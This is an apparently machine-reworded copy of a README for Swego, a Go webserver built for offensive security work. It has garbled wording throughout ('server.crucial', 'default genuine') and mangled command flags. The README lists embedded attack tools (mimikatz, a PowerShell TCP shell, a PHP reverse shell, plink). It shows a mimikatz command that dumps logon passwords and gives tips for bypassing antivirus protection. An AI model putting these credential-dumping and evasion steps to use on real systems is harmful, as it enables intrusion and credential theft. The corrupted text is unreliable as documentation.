Swego – Swiss Army Knife Webserver In Golang
Swiss army knife Webserver in Golang. Preserve simple like the python SimpleHTTPServer but with lots of attributes.
Utilization
Aid
$ ./webserver -assist
world-wide-web subcommand
-bind string
Bind Port (default "8080")
-certificate string
HTTPS certification : openssl req -new -x509 -sha256 -key server.crucial -out server.crt -days 365
-gzip
Enables gzip/zlib compression (default genuine)
-enable
Print utilization
-critical string
HTTPS Critical : openssl genrsa -out server.vital 2048
-password string
Password for standard auth, default: notsecure (default "notsecure")
-personal string
Personal folder with standard auth, default /tmp/SimpleHTTPServer-golang/src/bin/personal (default "personal")
-root string
Root folder (default "/tmp/SimpleHTTPServer-golang/src/bin")
-tls
Permits HTTPS
-username string
Username for simple auth, default: admin (default "admin")
run subcommand
Use:
./webserver-l inux-amd64 operate
Packaged Binaries:
World-wide-web server around HTTP
$ ./webserver
Sharing /tmp/ on 8080 ...
Sharing /tmp/personal on 8080 ...
World wide web server around HTTPS
$ openssl genrsa -out server.crucial 2048
Generating RSA non-public vital, 2048 little bit very long modulus (2 primes)
..........................................+++++
.................................................................................................................+++++
e is 65537 (0x010001)
$ openssl req -new -x509 -sha256 -crucial server.essential -out server.crt -times 365
You are about to be requested to enter data that will be integrated
into your certificate request.
What you are about to enter is what is termed a Distinguished Title or a DN.
There are very a couple fields but you can go away some blank
For some fields there will be a default benefit,
If you enter '.', the subject will be remaining blank.
-----
Place Identify (2 letter code) [AU]:
Point out or Province Name (entire identify) [Some-State]:
Locality Title (eg, town) []:
Organization Identify (eg, corporation) [Internet Widgits Pty Ltd]:
Organizational Device Name (eg, part) []:
Typical Name (e.g. server FQDN or YOUR identify) []:
Electronic mail Address []:
$ ./webserver web -tls -crucial server.important -cert server.crt
Sharing /tmp/ on 8080 ...
Sharing /tmp/personal on 8080 ...
Website server applying private directory and root directory
Private folder on exact listing
$ ./webserver-linux-amd64 net -non-public ThePrivateFolder -username nodauf -password nodauf
Sharing /tmp/ on 8080 ...
Sharing /tmp/ThePrivateFolder on 8080 ...
Unique route for root and private listing
$ ./webserver-linux-amd64 world wide web -personal /tmp/personal -root /dwelling/nodauf -username nodauf -password nodauf
Sharing /household/nodauf on 8080 ...
Sharing /tmp/personal on 8080 ...
Embedded binary (only on Windows)
Checklist the embedded binaries:
C:UsersNodauf>.webserver.exe operate
You must specify a binary to operate
-args string
Arguments for the binary
-binary string
Binary to execute
-aid
Print use
-record
List the embedded data files
Packaged Binaries:
Invoke-PowerShellTcp.ps1
mimikatz.exe
php-reverse-shell.php
plink.exe
Run binary with arguments:
C:UsersNodauf>.webserver.exe operate -binary mimikatz.exe -args "privilege::debug sekurlsa::logonpasswords"
....
Functioning binary this way could assist bypassing AV protections. At times the arguments sent to the binary may well be capture by the AV, if feasible use the interactive CLI of the binary (like mimikatz) or recompile the binary to change the arguments identify.
Functions
- HTTPS
- Listing listing
- Determine a personal folder with essential authentication
- Add file
- Download file as an encrypted zip (password: contaminated)
- Download folder with a zip
- Embedded data files
- Run embedded binary composed in C# (only available on Home windows)
- Build a folder from the browser
- Capability to execute embedded binary
Todo
- Insert aspect for research and exchange in embedded data files (for fill the IP address for instance)
- JS/CSS menu to give command line in powershell, some gtfobins, curl, wget to down load and execute
